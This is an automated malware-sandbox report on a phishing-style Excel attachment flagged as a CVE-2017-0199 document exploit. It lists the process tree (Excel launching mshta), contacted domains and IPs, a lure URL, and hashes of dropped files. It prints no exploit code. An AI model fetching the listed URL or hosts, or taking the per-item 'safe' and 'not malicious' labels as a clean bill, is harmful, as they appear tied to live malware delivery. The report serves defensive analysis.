behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1646794 Sample: ENQUIRY - RFQ 674441-76450.... Startdate: 24/03/2025 Architecture: WINDOWS Score: 60 19 t.emobility.energy 2->19 21 star-azurefd-prod.trafficmanager.net 2->21 23 5 other IPs or domains 2->23 31 Multi AV Scanner detection for submitted file 2->31 33 Excel sheet contains many unusual embedded objects 2->33 35 Document exploit detected (process start blacklist hit) 2->35 37 Sigma detected: Suspicious Microsoft Office Child Process 2->37 7 EXCEL.EXE 231 70 2->7         started        11 EXCEL.EXE 51 47 2->11         started        signatures3 process4 dnsIp5 25 s-part-0012.t-0009.t-msedge.net 13.107.246.40, 443, 49701, 49702 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 7->25 27 microsoft-10.ovslegodl.sched.ovscdns.com 43.152.182.96, 49687, 49689, 80 LILLY-ASUS Japan 7->27 29 2 other IPs or domains 7->29 17 C:\...\~$ENQUIRY - RFQ 674441-76450.xla.xlsx, data 7->17 dropped 13 splwow64.exe 1 7->13         started        15 mshta.exe 7->15         started        file6 process7

Screenshots

Download Video

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
ENQUIRY - RFQ 674441-76450.xla.xlsx28%VirustotalBrowse
ENQUIRY - RFQ 674441-76450.xla.xlsx28%ReversingLabsDocument-Excel.Exploit.CVE-2017-0199

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://t.emobility.energy/3yRDYq?&balance=tested&cleaner&0%Avira URL Cloudsafe
https://t.emobility.energy/3yRDYq?&balance=tested&cleaner0%Avira URL Cloudsafe

Domains and IPs

Download Network PCAP: filteredfull

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
s-part-0012.t-0009.t-msedge.net
13.107.246.40
truefalse
    		high
    host1.emobility.energy
    		162.19.137.157
    		truefalse
      		unknown
      microsoft-10.ovslegodl.sched.ovscdns.com
      		43.152.182.96
      		truefalse
        		high
        s-0005.dual-s-msedge.net
        		52.123.128.14
        		truefalse
          		high
          otelrules.svc.static.microsoft
          		unknown
          		unknownfalse
            		high
            t.emobility.energy
            		unknown
            		unknownfalse
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              https://otelrules.svc.static.microsoft/rules/excel.exe-Production-v19.bundlefalse
                		high
                https://t.emobility.energy/3yRDYq?&balance=tested&cleanerfalse
                • Avira URL Cloud: safe
                		unknown
                https://otelrules.svc.static.microsoft/rules/rule120607v1s19.xmlfalse
                  		high
                  https://otelrules.svc.static.microsoft/rules/rule120603v8s19.xmlfalse
                    		high
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://t.emobility.energy/3yRDYq?&balance=tested&cleaner&ENQUIRY - RFQ 674441-76450.xla.xlsx, F4B20000.0.drfalse
                    • Avira URL Cloud: safe
                    		unknown

                    World Map of Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public IPs

                    IPDomainCountryFlagASNASN NameMalicious
                    13.107.246.40
                    		s-part-0012.t-0009.t-msedge.netUnited States
                    		8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                    43.152.182.96
                    		microsoft-10.ovslegodl.sched.ovscdns.comJapan4249LILLY-ASUSfalse
                    217.154.55.185
                    		unknownUnited Kingdom
                    		8897KCOM-SPNService-ProviderNetworkex-MistralGBfalse
                    162.19.137.157
                    		host1.emobility.energyUnited States
                    		209CENTURYLINK-US-LEGACY-QWESTUSfalse

                    General Information

                    Joe Sandbox version:42.0.0 Malachite
                    Analysis ID:1646794
                    Start date and time:2025-03-24 09:31:13 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 5m 43s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:defaultwindowsofficecookbook.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:20
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • GSI enabled (VBA)
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:ENQUIRY - RFQ 674441-76450.xla.xlsx
                    Detection:MAL
                    Classification:mal60.expl.winXLSX@6/9@2/4
                    EGA Information:Failed
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .xlsx
                    • Found Word or Excel or PowerPoint or XPS Viewer
                    • Attach to Office via COM
                    • Active ActiveX Object
                    • Active ActiveX Object
                    • Scroll down
                    • Close Viewer
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe, MavInject32.exe
                    • Excluded IPs from analysis (whitelisted): 52.109.0.91, 23.204.23.20, 52.109.8.36, 13.89.179.10, 20.44.10.123, 52.123.128.14, 4.175.87.197, 20.190.152.19
                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, onedscolprdcus12.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, mobile.events.data.microsoft.com, onedscolprdcus05.centralus.cloudapp.azure.com, roaming.officeapps.live.com, osiprod-cus-buff-azsc-000.centralus.cloudapp.azure.com, dual-s-0005-office.config.skype.com, login.live.com, wus-azsc-config.officeapps.live.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, c.pki.goog, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, cus-azsc-000.roaming.officeapps.live.com, fe3cr.delivery.mp.microsoft.com, us1.roaming1.live.com.akadns.net, config.officeapps.live.com, us.configsvc1.live.com.akadns.
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtCreateKey calls found.
                    • Report size getting too big, too many NtOpenFile calls found.
                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadFile calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    04:33:25API Interceptor989x Sleep call for process: splwow64.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    13.107.246.40Payment Transfer Receipt.shtmlGet hashmaliciousHTMLPhisherBrowse
                    • www.aib.gov.uk/
                    NEW ORDER.xlsGet hashmaliciousUnknownBrowse
                    • 2s.gg/3zs
                    PO_OCF 408.xlsGet hashmaliciousUnknownBrowse
                    • 2s.gg/42Q
                    06836722_218 Aluplast.docx.docGet hashmaliciousUnknownBrowse
                    • 2s.gg/3zk
                    Quotation.xlsGet hashmaliciousUnknownBrowse
                    • 2s.gg/3zM
                    217.154.55.185Payment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                      Payment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                        162.19.137.157Payment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                          Payment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            microsoft-10.ovslegodl.sched.ovscdns.comexodus-inject.jsGet hashmaliciousUnknownBrowse
                            • 43.152.183.76
                            new.batGet hashmaliciousUnknownBrowse
                            • 43.175.186.85
                            https://customervoice.microsoft.com/Pages/ResponsePage.aspx?id=r3yI_dSxOEiPJ_sFtWv0u-et2ubyS_1IvjO44TlrG4RUNU4xQUtYREpWQVhXSzJWUVMxMkwySkhRUS4uGet hashmaliciousHTMLPhisherBrowse
                            • 43.175.186.87
                            https://energy.economictimes.indiatimes.com/redirect.php?url=///itemsidguest.comGet hashmaliciousUnknownBrowse
                            • 43.152.183.76
                            Setup.exeGet hashmaliciousUnknownBrowse
                            • 43.152.135.101
                            DE 34212 MELSUNGE.docxGet hashmaliciousUnknownBrowse
                            • 43.175.138.218
                            http://hoangboy23.github.io/Get hashmaliciousHTMLPhisherBrowse
                            • 43.175.151.231
                            https://cf7ea538-cbf0-4778-9cd4-8fb731f769e4-00-3qzkmy7nk9jfp.pike.replit.dev/Get hashmaliciousUnknownBrowse
                            • 101.33.11.219
                            https://www.gbt-inc.com/Get hashmaliciousUnknownBrowse
                            • 43.175.151.205
                            http://croxyproxys.comGet hashmaliciousUnknownBrowse
                            • 43.175.151.230
                            s-0005.dual-s-msedge.netPayment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                            • 52.123.128.14
                            Payment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                            • 52.123.128.14
                            https://waimao-north-star-mail.qiye.163.com/api/j/html?c=https%3A%2F%2F1drv.ms%2Fo%2Fs!AjlMaeoI5pi7f_GXm50IY_RD-sw%3Fe%3DEsmwj4%3Fcid%3Dsite_nqmm3LQS7c9jn-2FWvVcVpMl0NsyUA8yUApYElnaeUm2Ly_xlUzBpbEuLGet hashmaliciousUnknownBrowse
                            • 52.123.128.14
                            backwith.docGet hashmaliciousUnknownBrowse
                            • 52.123.129.14
                            backwith.docGet hashmaliciousUnknownBrowse
                            • 52.123.129.14
                            PC900-1new.exeGet hashmaliciousXRedBrowse
                            • 52.123.128.14
                            PC900-1new.exeGet hashmaliciousXRedBrowse
                            • 52.123.129.14
                            478# Confirmation Letter HR Team..emlGet hashmaliciousUnknownBrowse
                            • 52.123.129.14
                            oddj60.1EqD3.exeGet hashmaliciousXRed, XWormBrowse
                            • 52.123.129.14
                            DA6B.batGet hashmaliciousXRed, XWormBrowse
                            • 52.123.129.14
                            host1.emobility.energyPayment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            Payment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            s-part-0012.t-0009.t-msedge.nethttps://waimao-north-star-mail.qiye.163.com/api/j/html?c=https%3A%2F%2F1drv.ms%2Fo%2Fs!AjlMaeoI5pi7f_GXm50IY_RD-sw%3Fe%3DEsmwj4%3Fcid%3Dsite_nqmm3LQS7c9jn-2FWvVcVpMl0NsyUA8yUApYElnaeUm2Ly_xlUzBpbEuLGet hashmaliciousUnknownBrowse
                            • 13.107.246.40
                            https://offce365.auramisteriosafyr.it.com/CM4kN/Get hashmaliciousHTMLPhisherBrowse
                            • 13.107.246.40
                            PC900-1new.exeGet hashmaliciousXRedBrowse
                            • 13.107.246.40
                            SecuriteInfo.com.Win64.CrypterX-gen.5834.27621.exeGet hashmaliciousVidarBrowse
                            • 13.107.246.40
                            Player666.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.40
                            oddj60.1EqD3.exeGet hashmaliciousXRed, XWormBrowse
                            • 13.107.246.40
                            DA6B.batGet hashmaliciousXRed, XWormBrowse
                            • 13.107.246.40
                            3417774.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.40
                            weDo11E3Lr.exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.40
                            WizClient.exeGet hashmaliciousXWormBrowse
                            • 13.107.246.40

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            LILLY-ASUSarm.fkunigr.elfGet hashmaliciousMiraiBrowse
                            • 43.56.116.206
                            mips.elfGet hashmaliciousMirai, MoobotBrowse
                            • 43.56.252.108
                            sh4.elfGet hashmaliciousMirai, MoobotBrowse
                            • 43.58.120.247
                            https://offce365.auramisteriosafyr.it.com/CM4kN/Get hashmaliciousHTMLPhisherBrowse
                            • 43.128.193.190
                            resgod.mips.elfGet hashmaliciousMiraiBrowse
                            • 43.145.117.243
                            resgod.x86.elfGet hashmaliciousMiraiBrowse
                            • 42.129.237.20
                            owari.m68k.elfGet hashmaliciousUnknownBrowse
                            • 40.171.13.125
                            owari.arm5.elfGet hashmaliciousUnknownBrowse
                            • 40.165.168.94
                            owari.ppc.elfGet hashmaliciousUnknownBrowse
                            • 40.158.15.83
                            owari.i586.elfGet hashmaliciousUnknownBrowse
                            • 40.196.205.168
                            KCOM-SPNService-ProviderNetworkex-MistralGBPayment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                            • 217.154.55.185
                            Payment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                            • 217.154.55.185
                            Client.exeGet hashmaliciousQuasarBrowse
                            • 212.56.35.232
                            H67PoQSrNz.exeGet hashmaliciousQuasarBrowse
                            • 212.56.35.232
                            iaminthebestdutyservicewithgreatnessgiven.htaGet hashmaliciousRemcosBrowse
                            • 217.154.16.81
                            888.exeGet hashmaliciousGO BackdoorBrowse
                            • 195.200.31.22
                            73ybGtnYXx.exeGet hashmaliciousWhiteSnake StealerBrowse
                            • 194.164.198.113
                            m68k.elfGet hashmaliciousMiraiBrowse
                            • 158.179.55.1
                            Owncloud.exeGet hashmaliciousGO Backdoor, LummaC StealerBrowse
                            • 195.200.31.22
                            Acrobat.exeGet hashmaliciousScreenConnect ToolBrowse
                            • 86.54.42.29
                            CENTURYLINK-US-LEGACY-QWESTUSPayment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            Payment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            arm.fkunigr.elfGet hashmaliciousMiraiBrowse
                            • 209.181.9.180
                            resgod.ppc.elfGet hashmaliciousMiraiBrowse
                            • 75.174.171.216
                            resgod.x86.elfGet hashmaliciousMiraiBrowse
                            • 184.98.240.216
                            owari.i686.elfGet hashmaliciousUnknownBrowse
                            • 67.150.235.52
                            owari.ppc.elfGet hashmaliciousUnknownBrowse
                            • 137.107.82.164
                            owari.sh4.elfGet hashmaliciousUnknownBrowse
                            • 97.118.188.84
                            owari.mips.elfGet hashmaliciousUnknownBrowse
                            • 70.57.201.132
                            loligang.ppc.elfGet hashmaliciousMiraiBrowse
                            • 63.239.57.253
                            MICROSOFT-CORP-MSN-AS-BLOCKUSarm.fkunigr.elfGet hashmaliciousMiraiBrowse
                            • 23.100.229.117
                            Z9dgTYzz4x.exeGet hashmaliciousRHADAMANTHYSBrowse
                            • 150.171.27.11
                            spc.elfGet hashmaliciousMirai, MoobotBrowse
                            • 20.91.231.76
                            mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                            • 20.4.121.213
                            x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                            • 157.55.40.153
                            1 (1035).exeGet hashmaliciousPoisonivyBrowse
                            • 204.79.197.203
                            https://tl.phoneky.com/android/?id=d1d149166Get hashmaliciousUnknownBrowse
                            • 20.157.93.108
                            https://waimao-north-star-mail.qiye.163.com/api/j/html?c=https%3A%2F%2F1drv.ms%2Fo%2Fs!AjlMaeoI5pi7f_GXm50IY_RD-sw%3Fe%3DEsmwj4%3Fcid%3Dsite_nqmm3LQS7c9jn-2FWvVcVpMl0NsyUA8yUApYElnaeUm2Ly_xlUzBpbEuLGet hashmaliciousUnknownBrowse
                            • 52.109.16.92
                            PC900-1new.exeGet hashmaliciousXRedBrowse
                            • 13.107.246.40

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            6271f898ce5be7dd52b0fc260d0662b3Player666.exeGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            Player666.exeGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            https://github.com/abunaj3/abjjd/releases/download/2/2.mp3Get hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            PO10026369-1.xlsGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            PO No 6500023972.xlsGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            PO10026369-1.xlsGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            PO No 6500023972.xlsGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            http://clean-out.proGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            https://www.flugger.pl/Get hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            Nueva orden.xla.xlsxGet hashmaliciousUnknownBrowse
                            • 162.19.137.157
                            a0e9f5d64349fb13191bc781f81f42e1random(12).exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.40
                            Payment Advice 24-03-2025.docx.docGet hashmaliciousUnknownBrowse
                            • 13.107.246.40
                            random(11).exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.40
                            ZqkKpwG.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.40
                            random(3).exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.40
                            random(1).exeGet hashmaliciousLummaC StealerBrowse
                            • 13.107.246.40
                            random(9).exeGet hashmaliciousAmadey, CryptOne, LummaC Stealer, Socks5SystemzBrowse
                            • 13.107.246.40
                            ZqkKpwG.exeGet hashmaliciousUnknownBrowse
                            • 13.107.246.40
                            PC900-1new.exeGet hashmaliciousXRedBrowse
                            • 13.107.246.40
                            PC900-1new.exeGet hashmaliciousXRedBrowse
                            • 13.107.246.40

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):118
                            Entropy (8bit):3.5700810731231707
                            Encrypted:false
                            SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                            MD5:573220372DA4ED487441611079B623CD
                            SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                            SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                            SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                            C:\Users\user\AppData\Local\Temp\E98C2152.tmp

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):820
                            Entropy (8bit):2.7159862044217853
                            Encrypted:false
                            SSDEEP:24:YIrNyk+vpKAzH5wcfHGFAAJp9WtAZRJ5poIHWI:Ymt+RfzHuc8AAJtfJ52IHV
                            MD5:4C216BA54D1A1E057DBD017884BCAE68
                            SHA1:04F6A2A122C952A6EE4E54FDB8185D4052074B21
                            SHA-256:80AB97552897B6DD6B37DC244018756D8FE893435AA360A26BFF8E6560D81E9C
                            SHA-512:1F5F905260B372F9AEE7B6E574F0F427A85F74F30AB90B2CBF7847462A437C8907BDCA33D54260F685AEC64CC53E3241E37A8D6999AB01138C08DB2B39FF7371
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview:3.7.4.6.3.7.6.,.1.1.9.6.3.7.8.,.1.7.8.8.6.5.8.,.2.5.5.0.5.0.8.8.,.1.2.5.,.1.1.9.,.7.0.0.9.9.8.4.,.3.0.0.4.9.2.6.8.,.;.3.2.9.4.5.8.7.9.9.,.3.7.4.6.3.7.8.,.6.3.6.4.3.3.4.,.1.1.1.1.,.3.0.1.5.3.7.2.1.,.2.3.7.1.6.5.1.,.6.3.6.4.3.3.7.,.1.0.0.1.,.6.5.4.0.2.1.5.,.2.4.6.0.9.2.5.8.,.4.0.6.9.3.5.8.2.,.1.0.4.9.5.2.3.4.,.6.3.6.4.3.1.8.,.3.0.1.2.3.4.6.6.,.2.7.1.5.3.4.9.7.,.6.3.7.1.6.9.4.,.5.9.2.2.3.4.2.3.,.5.7.9.9.9.6.6.1.,.1.5.6.1.9.5.8.,.6.3.0.6.3.0.9.9.,.2.7.3.6.0.0.9.5.,.5.8.4.2.5.8.6.0.,.6.1.7.0.7.3.0.7.,.6.3.6.4.3.3.0.,.6.3.6.4.3.3.1.,.6.7.4.8.3.9.6.1.4.,.3.3.7.9.1.6.2.,.4.7.3.8.2.9.4.8.,.1.6.5.7.4.5.3.,.1.0.6.9.5.5.2.,.1.6.5.7.4.5.2.,.5.2.9.1.0.0.0.0.,.1.3.5.2.5.8.6.,.1.3.5.2.5.8.7.,.1.7.7.1.6.5.7.,.1.0.2.3.8.6.4.,.1.0.2.3.6.3.8.,.6.3.7.1.6.9.5.,.4.8.1.9.5.5.3.8.,.1.4.6.1.9.5.3.,.6.3.6.4.3.3.2.,.3.2.0.5.9.2.7.6.7.,.

                            C:\Users\user\AppData\Local\Temp\~DF22D3D956E99F2CBB.TMP

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):634880
                            Entropy (8bit):7.886858057536777
                            Encrypted:false
                            SSDEEP:12288:HX33Nhjs7sv94GMBG1HcdhUyvcgQ5dM+9lYay1HLycEvQG/2ipLsbdBR2T:n3NhB4GMBXZ1OdM+9cxEveOoBf2
                            MD5:91B3395CC3DB0945E3187D012BEB5369
                            SHA1:1666E3C39D49CFE38BE6C0C0C2EF35623EC9373B
                            SHA-256:8297FA9B0E2E1881D942DCDA85EE2CB7D6A9DC1DEB05B6BD876263121D73170A
                            SHA-512:4989F4F98E9DA3BBCBFD7E6A6A02F68EFAC131583F13E92186C4097EC7524BED36C3FBE3898578B17C080AF5348B3176FAD0D50AA6640A9CD4C42573C12FD083
                            Malicious:false
                            Reputation:low
                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Local\Temp\~DF47F8F0D42EFF3FED.TMP

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Cannot read section info
                            Category:dropped
                            Size (bytes):633344
                            Entropy (8bit):7.923599169232986
                            Encrypted:false
                            SSDEEP:12288:MX33Nhjs7sv94GMBG1HcdhUyvcgQ5dM+9lYay1HLycEvQG/2ipLsbdBR2T:K3NhB4GMBXZ1OdM+9cxEveOoBf2
                            MD5:40EEF5A58533874DB28316B7D9A7BF3B
                            SHA1:EC548BF829FDB4968453E52D80184C3991F13ECE
                            SHA-256:C4F68E9817BE6C4FFA493BFBF3AB07AE78630D415BBE790A2E09E6F66310B2FA
                            SHA-512:0F290FEAF13C1540CE1F8D817D4B0E3075F055121A7145D016EBFB03A8FBCBA1E2D45205F8BE48A156E3B4D9C96D8BA4257B1C7B548D66CCB01B784FD9BD575C
                            Malicious:false
                            Preview:......................>...................!........................................................................................................................................................... ...!...........................................................................................................................................................................................................................................................................................................................................................................................................................................................#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                            C:\Users\user\AppData\Local\Temp\~DFC4E18E65F4ED17CF.TMP

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\Desktop\ENQUIRY - RFQ 674441-76450.xla.xls (copy)

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 24 08:33:41 2025, Security: 1
                            Category:dropped
                            Size (bytes):1416192
                            Entropy (8bit):7.9836198533327485
                            Encrypted:false
                            SSDEEP:24576:63NhB4GMBXZ1OdM+9cxEveOoBf2AbMzbXj2gI5GEYP2z8YbVPVp1uCy:Kxypr+9cce/Bf2BzLu8Ybr
                            MD5:96EC5B48F5D7E610A1C3571CC8770936
                            SHA1:25C0F75729C5E7F90B22C870D7FBB52C7A86B49E
                            SHA-256:4EEF0DAA76DE7C1E377F3C87989AEB32D6926B2A64D73A19C1D44DE2F4E06C36
                            SHA-512:69FD0E219F573E7B199B93558C42AE512A342723647F7882A5E8F5B5F0B7022420A844A1BB24A1EF7D910B5346A91A54EE936F49A590F8088AFF7E579464A8BD
                            Malicious:false
                            Preview:......................>...............................................................................................b.......d.......f.......h.......j.......l........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                            C:\Users\user\Desktop\F4B20000

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Mar 24 08:33:41 2025, Security: 1
                            Category:dropped
                            Size (bytes):1416192
                            Entropy (8bit):7.9836198533327485
                            Encrypted:false
                            SSDEEP:24576:63NhB4GMBXZ1OdM+9cxEveOoBf2AbMzbXj2gI5GEYP2z8YbVPVp1uCy:Kxypr+9cce/Bf2BzLu8Ybr
                            MD5:96EC5B48F5D7E610A1C3571CC8770936
                            SHA1:25C0F75729C5E7F90B22C870D7FBB52C7A86B49E
                            SHA-256:4EEF0DAA76DE7C1E377F3C87989AEB32D6926B2A64D73A19C1D44DE2F4E06C36
                            SHA-512:69FD0E219F573E7B199B93558C42AE512A342723647F7882A5E8F5B5F0B7022420A844A1BB24A1EF7D910B5346A91A54EE936F49A590F8088AFF7E579464A8BD
                            Malicious:false
                            Preview:......................>...............................................................................................b.......d.......f.......h.......j.......l........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                            C:\Users\user\Desktop\F4B20000:Zone.Identifier

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:modified
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0

                            C:\Users\user\Desktop\~$ENQUIRY - RFQ 674441-76450.xla.xlsx

                            Download File
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):165
                            Entropy (8bit):1.3520167401771568
                            Encrypted:false
                            SSDEEP:3:qs/FFyGff:qsyWf
                            MD5:5C22367453CA7CD5BD7CA96C4FD55742
                            SHA1:FC7428D064740B4E331D57098AF028AA26FBC1AE
                            SHA-256:F5D3D989BFAC7CF7187B3665F8CB75AF84FD749DBE245E454E2F9F1AC562E543
